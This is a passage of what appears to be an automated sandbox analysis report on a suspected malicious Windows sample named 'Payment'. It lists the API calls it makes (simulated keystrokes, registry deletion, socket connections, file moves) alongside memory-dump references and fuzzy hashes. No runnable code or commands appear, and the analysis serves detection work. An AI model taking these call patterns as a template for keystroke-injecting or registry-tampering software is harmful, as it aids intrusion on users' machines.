                                                          • SetKeyboardState.USER32(?), ref: 00B31512
                                                          • PostMessageW.USER32(?,00000101,00000010,?), ref: 00B31540
                                                          • PostMessageW.USER32(?,00000101,00000011,?), ref: 00B3155F
                                                          • PostMessageW.USER32(?,00000101,00000012,?), ref: 00B315A5
                                                          • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00B315C8
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: MessagePost$KeyboardState$Parent
                                                          • String ID:
                                                          • API String ID: 87235514-0
                                                          • Opcode ID: 56befceeab217e8242616f554829ab01ae20e871ab5ee06ec4f9cf54770e56f9
                                                          • Instruction ID: 0e930c358ae54bdcbfc00f27dac321e00d6340d6f76408192fd0d8435d853275
                                                          • Opcode Fuzzy Hash: 56befceeab217e8242616f554829ab01ae20e871ab5ee06ec4f9cf54770e56f9
                                                          • Instruction Fuzzy Hash: 8951F2A06047D53EFB32476C8C45BBABEED9B46304F2C48C9E1D6568C2C694EC94DB50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetParent.USER32(00000000), ref: 00B312B5
                                                          • GetKeyboardState.USER32(?), ref: 00B312CA
                                                          • SetKeyboardState.USER32(?), ref: 00B3132B
                                                          • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00B31357
                                                          • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00B31374
                                                          • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00B313B8
                                                          • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00B313D9
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: MessagePost$KeyboardState$Parent
                                                          • String ID:
                                                          • API String ID: 87235514-0
                                                          • Opcode ID: 97e5c0fd70a8cab6101f668295a0eb7e3a8b91f62006adb84df6221af39bb4df
                                                          • Instruction ID: f853529d32cdddbaaeaafcb485e52b3e773ec070e26cb61c966a1fff65757f04
                                                          • Opcode Fuzzy Hash: 97e5c0fd70a8cab6101f668295a0eb7e3a8b91f62006adb84df6221af39bb4df
                                                          • Instruction Fuzzy Hash: 815112A05447D57DFB3283288C41BBABFED9F06300F288CC9E1D4568C2D794AC98D764
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: _wcsncpy$LocalTime
                                                          • String ID:
                                                          • API String ID: 2945705084-0
                                                          • Opcode ID: d9072e76b8ee3ca4081d1d046765f1d861b0765605abd4c4962bcf62ba78e396
                                                          • Instruction ID: bc29a20e02bb1989e84b884cda8a97865359274839303e2e3f8e7ae2906392e7
                                                          • Opcode Fuzzy Hash: d9072e76b8ee3ca4081d1d046765f1d861b0765605abd4c4962bcf62ba78e396
                                                          • Instruction Fuzzy Hash: 1141836AC2161C76CB20FBF4C986ADFB7AC9F04310F608566F618E3121E634E715C7A5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 00B348AA: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00B338D3,?), ref: 00B348C7
                                                            • Part of subcall function 00B348AA: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00B338D3,?), ref: 00B348E0
                                                          • lstrcmpiW.KERNEL32(?,?), ref: 00B338F3
                                                          • _wcscmp.LIBCMT ref: 00B3390F
                                                          • MoveFileW.KERNEL32(?,?), ref: 00B33927
                                                          • _wcscat.LIBCMT ref: 00B3396F
                                                          • SHFileOperationW.SHELL32(?), ref: 00B339DB
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                                                          • String ID: \*.*
                                                          • API String ID: 1377345388-1173974218
                                                          • Opcode ID: 1ca962fd78a1ce6f8ae3f6159ee17abb1d718859da478bd56348e9827671602c
                                                          • Instruction ID: 2fb759cd935cc0ae09f5e84208d6fb7055d817be71074c5e4618599d3910eddc
                                                          • Opcode Fuzzy Hash: 1ca962fd78a1ce6f8ae3f6159ee17abb1d718859da478bd56348e9827671602c
                                                          • Instruction Fuzzy Hash: 0B4193715083449EC751EF64C481AEFB7E8EF89740F64096EB48AC3151EB74D688C752
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • _memset.LIBCMT ref: 00B57519
                                                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00B575C0
                                                          • IsMenu.USER32(?), ref: 00B575D8
                                                          • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00B57620
                                                          • DrawMenuBar.USER32 ref: 00B57633
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: Menu$Item$DrawInfoInsert_memset
                                                          • String ID: 0
                                                          • API String ID: 3866635326-4108050209
                                                          • Opcode ID: dd6f3b38e15725465808839ddb28e50221a0e47462af95c42b1319101d49ca13
                                                          • Instruction ID: 5eabcb61d3c3751b2dc64e2cb766490caeaabe169e2030103fecade193ddd8f8
                                                          • Opcode Fuzzy Hash: dd6f3b38e15725465808839ddb28e50221a0e47462af95c42b1319101d49ca13
                                                          • Instruction Fuzzy Hash: A7412975A04609EFDB10DF54E984FAABBF8FB08351F0481AAED1597250DB30AD54CF90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 00B5125C
                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00B51286
                                                          • FreeLibrary.KERNEL32(00000000), ref: 00B5133D
                                                            • Part of subcall function 00B5122D: RegCloseKey.ADVAPI32(?), ref: 00B512A3
                                                            • Part of subcall function 00B5122D: FreeLibrary.KERNEL32(?), ref: 00B512F5
                                                            • Part of subcall function 00B5122D: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00B51318
                                                          • RegDeleteKeyW.ADVAPI32(?,?), ref: 00B512E0
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                          • String ID:
                                                          • API String ID: 395352322-0
                                                          • Opcode ID: 99f9d44f1f6c53eda1ef108bc462aa2736952fc60a656c6b77134cdc1a1d9a44
                                                          • Instruction ID: f6d788d8c6f81fde75dd9fbfb34cde7cbb4f19611b71f3ce24a168157ee910b8
                                                          • Opcode Fuzzy Hash: 99f9d44f1f6c53eda1ef108bc462aa2736952fc60a656c6b77134cdc1a1d9a44
                                                          • Instruction Fuzzy Hash: 96313CB1901209BFDB149F94DC99FFFB7BCEB08301F0405E9E911E3151DA749E499AA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00B5655B
                                                          • GetWindowLongW.USER32(01485E80,000000F0), ref: 00B5658E
                                                          • GetWindowLongW.USER32(01485E80,000000F0), ref: 00B565C3
                                                          • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00B565F5
                                                          • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00B5661F
                                                          • GetWindowLongW.USER32(00000000,000000F0), ref: 00B56630
                                                          • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00B5664A
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: LongWindow$MessageSend
                                                          • String ID:
                                                          • API String ID: 2178440468-0
                                                          • Opcode ID: 89a6fe8206bb437952d18b3540f4d81cca194ac9ea1a6fcf9859255f744ed7ca
                                                          • Instruction ID: 19295abd497d6e044f2aa8f13af1038cb59f769e2fff0fae093f7e11492c33d1
                                                          • Opcode Fuzzy Hash: 89a6fe8206bb437952d18b3540f4d81cca194ac9ea1a6fcf9859255f744ed7ca
                                                          • Instruction Fuzzy Hash: EF310230644215AFEB208F18EC84F653BE1FB5A352F9801EAF901CB2B5DB71AC48DB41
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 00B480A0: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00B480CB
                                                          • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00B464D9
                                                          • WSAGetLastError.WSOCK32(00000000), ref: 00B464E8
                                                          • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00B46521
                                                          • connect.WSOCK32(00000000,?,00000010), ref: 00B4652A
                                                          • WSAGetLastError.WSOCK32 ref: 00B46534
                                                          • closesocket.WSOCK32(00000000), ref: 00B4655D
                                                          • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00B46576
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                                                          • String ID:
                                                          • API String ID: 910771015-0
                                                          • Opcode ID: ef8fe21169b220e5e75ce64583ba76afeccae1b32e2682b7c0d9dc018a0540c2
                                                          • Instruction ID: a7779a0a0f813b70185b3322c698cce8d48203779c6e2c0f110c4b18c473c1c0
                                                          • Opcode Fuzzy Hash: ef8fe21169b220e5e75ce64583ba76afeccae1b32e2682b7c0d9dc018a0540c2
                                                          • Instruction Fuzzy Hash: 09319031600218ABDF10AF24CC85BBE7BECEB45711F0040A9F90A97391DB74AE04DB62
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00B2E0FA
                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00B2E120
                                                          • SysAllocString.OLEAUT32(00000000), ref: 00B2E123
                                                          • SysAllocString.OLEAUT32 ref: 00B2E144
                                                          • SysFreeString.OLEAUT32 ref: 00B2E14D
                                                          • StringFromGUID2.OLE32(?,?,00000028), ref: 00B2E167
                                                          • SysAllocString.OLEAUT32(?), ref: 00B2E175
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                          • String ID:
                                                          • API String ID: 3761583154-0
                                                          • Opcode ID: 2f757b449f9c56b7d30523fcd51d224db79cc827378a1a4d52d6827af4eea444
                                                          • Instruction ID: b83eeeda51737d7970c75b744d55f585ba64e46360d1064a0d9d856f3212629e
                                                          • Opcode Fuzzy Hash: 2f757b449f9c56b7d30523fcd51d224db79cc827378a1a4d52d6827af4eea444
                                                          • Instruction Fuzzy Hash: 9D21A731200219AFDB109FA9DC89DBBB7ECEB09761B008175FA18DB2A0DB74DC418B60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 00AD1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00AD1D73
                                                            • Part of subcall function 00AD1D35: GetStockObject.GDI32(00000011), ref: 00AD1D87
                                                            • Part of subcall function 00AD1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00AD1D91
                                                          • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00B578A1
                                                          • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00B578AE
                                                          • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00B578B9
                                                          • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00B578C8
                                                          • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00B578D4
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$CreateObjectStockWindow
                                                          • String ID: Msctls_Progress32
                                                          • API String ID: 1025951953-3636473452
                                                          • Opcode ID: 79a2a2c732c0f6a16f598c611cc0ef8886128f90a254a0b7a40fba8037970e3a
                                                          • Instruction ID: 081b9c8eb0d4a2450003411966223ab3547f2570fb68c2c953015a9b9d43b8aa
                                                          • Opcode Fuzzy Hash: 79a2a2c732c0f6a16f598c611cc0ef8886128f90a254a0b7a40fba8037970e3a
                                                          • Instruction Fuzzy Hash: DF1186B1650219BFEF159F61CC85EE77F5DEF08758F014155FA04A60A0CB719C21DBA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00AF4292,?), ref: 00AF41E3
                                                          • GetProcAddress.KERNEL32(00000000), ref: 00AF41EA
                                                          • EncodePointer.KERNEL32(00000000), ref: 00AF41F6
                                                          • DecodePointer.KERNEL32(00000001,00AF4292,?), ref: 00AF4213
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                          • String ID: RoInitialize$combase.dll
                                                          • API String ID: 3489934621-340411864
                                                          • Opcode ID: 26adc945e0e72174b576fa01ac4d59c4fb9c20bef9a8d507933471035cb4063b
                                                          • Instruction ID: a5a9d7808afe5aa3ff63aa58286a157483de69b5a81e79a10f2d9147896f2c52
                                                          • Opcode Fuzzy Hash: 26adc945e0e72174b576fa01ac4d59c4fb9c20bef9a8d507933471035cb4063b
                                                          • Instruction Fuzzy Hash: 90E01AB0690711AEFB206BB0ED09F257EA4BB24743F1044B5B512E70F0DFB540928F14
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00AF41B8), ref: 00AF42B8
                                                          • GetProcAddress.KERNEL32(00000000), ref: 00AF42BF
                                                          • EncodePointer.KERNEL32(00000000), ref: 00AF42CA
                                                          • DecodePointer.KERNEL32(00AF41B8), ref: 00AF42E5
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                          • String ID: RoUninitialize$combase.dll
                                                          • API String ID: 3489934621-2819208100
                                                          • Opcode ID: a7281ed2fa95f557f406b1ea75cb7f81e399873fc27a54dae7a0930d107cd23b
                                                          • Instruction ID: 14a31a908f76f53f714fee2fbac523ddb8a02a217783641c538578479016e533
                                                          • Opcode Fuzzy Hash: a7281ed2fa95f557f406b1ea75cb7f81e399873fc27a54dae7a0930d107cd23b
                                                          • Instruction Fuzzy Hash: 94E0B678581712ABEB10ABA0EE0DF667EA4BB24787F1040B6F105F30B0CFB54541CA18
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: _memmove$__itow__swprintf
                                                          • String ID:
                                                          • API String ID: 3253778849-0
                                                          • Opcode ID: 93b3fe1bf09b770244ec23dce923942e0d514e4956ba1ddd2cbb217d59e0d148
                                                          • Instruction ID: 19dcd26b6cc492090040327c7dc479c070cc752a1db90c01abdf612ec3c0f15d
                                                          • Opcode Fuzzy Hash: 93b3fe1bf09b770244ec23dce923942e0d514e4956ba1ddd2cbb217d59e0d148
                                                          • Instruction Fuzzy Hash: 2161AD3050065AABCF11EF60CE92FFE77A4AF48308F14859AF95A5B292DB34ED45CB50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 00AD7F41: _memmove.LIBCMT ref: 00AD7F82
                                                            • Part of subcall function 00B510A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00B50038,?,?), ref: 00B510BC
                                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00B50548
                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00B50588
                                                          • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00B505AB
                                                          • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00B505D4
                                                          • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00B50617
                                                          • RegCloseKey.ADVAPI32(00000000), ref: 00B50624
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                                          • String ID:
                                                          • API String ID: 4046560759-0
                                                          • Opcode ID: 71d12f15b552e5b2ccfc5fec12b6bd093b859767028ac4700a6a764b60e9c759
                                                          • Instruction ID: 3d5ba19e92b2f1435b8a24381e603b65eee88827ac699232ccbf72de03497fab
                                                          • Opcode Fuzzy Hash: 71d12f15b552e5b2ccfc5fec12b6bd093b859767028ac4700a6a764b60e9c759
                                                          • Instruction Fuzzy Hash: 47514931118201AFC714EF64D985E6FBBE8FF88315F04499EF956872A1EB31E909CB52
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetMenu.USER32(?), ref: 00B55A82
                                                          • GetMenuItemCount.USER32(00000000), ref: 00B55AB9
                                                          • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00B55AE1
                                                          • GetMenuItemID.USER32(?,?), ref: 00B55B50
                                                          • GetSubMenu.USER32(?,?), ref: 00B55B5E
                                                          • PostMessageW.USER32(?,00000111,?,00000000), ref: 00B55BAF
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: Menu$Item$CountMessagePostString
                                                          • String ID:
                                                          • API String ID: 650687236-0
                                                          • Opcode ID: 3e92d6264b2362795147fc48e45c7bf018105b3019c17b1676962431cb7b28b8
                                                          • Instruction ID: 6ad137814004cd9170a3a8bf21e007299585419a1a6c00bb74d9f4d908b57b9c
                                                          • Opcode Fuzzy Hash: 3e92d6264b2362795147fc48e45c7bf018105b3019c17b1676962431cb7b28b8
                                                          • Instruction Fuzzy Hash: 37515C35A00615EFCF25AFA4C995AAEB7F4EF48312F1044E9FD02A7351CB70AE458B90
                                                          Uniqueness

